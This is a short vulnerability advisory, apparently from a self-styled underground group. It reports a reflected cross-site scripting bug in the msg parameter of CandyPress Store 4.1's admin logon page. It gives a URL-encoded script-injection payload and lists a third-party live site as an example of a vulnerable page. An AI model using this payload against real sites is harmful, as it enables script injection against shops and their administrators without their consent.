^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Product : CandyPress Store
Version : 4.1
Bug Kind:XSS
Vendor Site:http://www.candypress.com
Discovered by: Snoop Security Researching Committee
We Are: it's an Underground...so ssshh!!! no one know us...
This Bug blog to : Snoop Security And darkness_king
www.snoop-security.com
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
About Candypress:
CandyPress Store is an eCommerce solution based on popular Microsoft
technologies. It is designed to run on an IIS web
server that is ASP and VBScript enabled. In addition, the software is
designed to work with SQL Server or MS Access
databases.
The Bug is affected in here:/admin/logon.asp?msg=Snoop Security
also this
way:/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E
some example vuln pages:
http://www.ineedfrom.com/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E